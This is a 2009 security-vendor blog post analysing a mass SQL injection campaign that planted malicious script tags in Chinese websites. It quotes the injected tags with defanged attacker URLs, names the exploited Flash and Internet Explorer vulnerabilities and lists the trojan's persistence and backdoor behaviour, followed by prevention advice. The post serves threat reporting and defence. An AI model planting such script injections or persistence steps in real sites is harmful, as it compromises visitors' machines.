BannerPortlet

Blogs

Recently, a new wave of massive SQL injection attacks has been detected by Bkis researchers. At the climax of the wave, according to Google search results, more than 187.000 websites were compromised.

In the infected website list, most of them are Chinese websites, including Chinese government websites  with the .gov.cn domain names, .edu.cn websites...

google-massive-sql-injection

Google search results

All these websites have SQL injection flaw, database has been injected many times with the following code: script src=hxxp://wgwggg.cn:1/1.js script

(Update on 17 Dec 2009: According to our latest analysis, hackers have injected new code into more than 178.000 websites as follow: script src = hxxp://a.118cc.cn script. You can see the Google search results here)

sample1_small

View source of an infected website with malicious script

When users visit these websites, the script will be executed and silently loads hidden iframes which contain exploit codes from malicious websites, then download malwares to the users’ computers.

source_small

Malicious code in .js file

tree_small

Exploit tree

Malicious websites use exploit codes of following vulnerabilities:

  • Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
  • MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
  • Microsoft Office Web Components vulnerabilities described in MS09-043
  • Microsoft video ActiveX vulnerability described in MS09-032
  • Internet Explorer Uninitialized Memory Corruption Vulnerability described in MS09-002.

Successful exploit will silently download the file upload.css (W32.CSSExploit.Trojan detected by Bkav) and install it on users’ computers.

Virus W32.CSSExploit.Trojan has the following technical details:

  1. Dumps file: %UserProfile%\[RandomName].drv
  2. Renames itself to “auto.exe” then copies itself to %ProgramFiles%\Common Files\ folder
  3. Write the key: [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\auto]
  4. and registers the service: DrvKiller to run the virus at Windows start-up.
  5. Copies file “autorun.inf” and itself to all drives for spreading.
  6. Changes homepage to http://www.playbo[removed]ing.com.cn:8788/
  7. Installs backdoor to allow hacker to remote control computers
  8. Downloads and executes many online game viruses and other malwares on the infected computers.

According to the analysis, the virus and the wave of attacks are suspected to be originated from Chinese.

We are still tracking and making further analysis on this attack.

Recommendation for prevention:

  • Up to now, many websites are still unfixed. Admins of these websites should quickly remove malicious scripts injected into database and fix websites’ SQL injection flaws to prevent the next wave of attack.
  • Users should update the latest Microsoft and Adobe patches.
  • Users should update the anti-virus software.

Bkis

 

 

- Update your anti-virus software.

Leave a Reply

Name (required)
Mail (hidden) (required)
Website
Text to Identify
Reload-Capcha
CAPTCHA Code *

Popup Date Time Portlet

Blogs Aggregator

Blog Category Portlet

Categories

Store Portlet

Archives

Vote Baby Portlet